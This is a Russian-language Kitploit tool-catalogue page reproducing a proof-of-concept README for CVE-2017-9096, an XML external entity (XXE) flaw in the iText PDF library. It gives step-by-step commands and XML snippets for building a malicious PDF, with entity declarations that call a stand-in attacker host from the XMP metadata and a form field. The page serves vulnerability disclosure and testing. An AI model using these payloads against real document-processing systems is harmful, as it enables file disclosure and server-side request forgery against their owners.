Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-9096-iText-XXE — Эксплойт для проверки концепции уязвимости CVE-2017-9096, демонстрирующий внедрение XML-внешних сущностей (XXE) в библиотеке iText PDF через вредоносные метаданные XMP и поля форм. | Kitploit
Инструменты/GitHubGitHub/jakabakos/cve-2017-9096-itext-xxe
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФаззингТестирование на Проникновение
GitHubjakabakos/cve-2017-9096-itext-xxe

CVE-2017-9096-iText-XXE

Эксплойт для проверки концепции уязвимости CVE-2017-9096, демонстрирующий внедрение XML-внешних сущностей (XXE) в библиотеке iText PDF через вредоносные метаданные XMP и поля форм.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1334 лет назадЕщё не проверено

CVE-2017-9096

1. Создание вредоносного PDF с XXE

Получите PDF с формой:

root@kitploit:~
wget https://www.pdfscripting.com/public/FreeStuff/PDFSamples/ModifySubmit_Example.pdf -O input.pdf

Распаковка PDF

Для этого необходимо распаковать PDF с помощью qpdf --qdf --object-streams=disable input.pdf output.pdf, затем вы можете отредактировать PDF в текстовом редакторе и добавить вредоносный XML.

Добавление внешних сущностей

Вы можете поместить XEE в метаданные XMP в строке 77:

root@kitploit:~
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [ <!ENTITY xxe2 SYSTEM "http://attacker.net" > ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.0-c321 44.398116, Tue Aug 04 2009 14:24:39">

И, конечно, поместите ссылку куда-нибудь, например, в строку 88:

root@kitploit:~
<xap:CreatorTool>Adobe LiveCycle Designer 8.0 &xxe2;</xap:CreatorTool>

Вы также можете добавить обычный XXE в файл. Посмотрите эту часть в исходном документе (начинается со строки 740):

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Измените её на следующее:

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Затем просто добавьте ссылку куда-нибудь, например, в поле City (строка 1845 в исходном распакованном документе). Измените это:

root@kitploit:~
<text
>City:</text
></value
>

На это:

root@kitploit:~
<text
>City:</text
><xxe>&xxe;</xxe></value
>

Исправленный PDF, содержащий оба XXE, также находится в этом репозитории (output_with_xxe.pdf)

2. Проведение атаки

Запустите Java-приложение для тестирования PDF с помощью mvn clean compile exec:java.

Скачать инструмент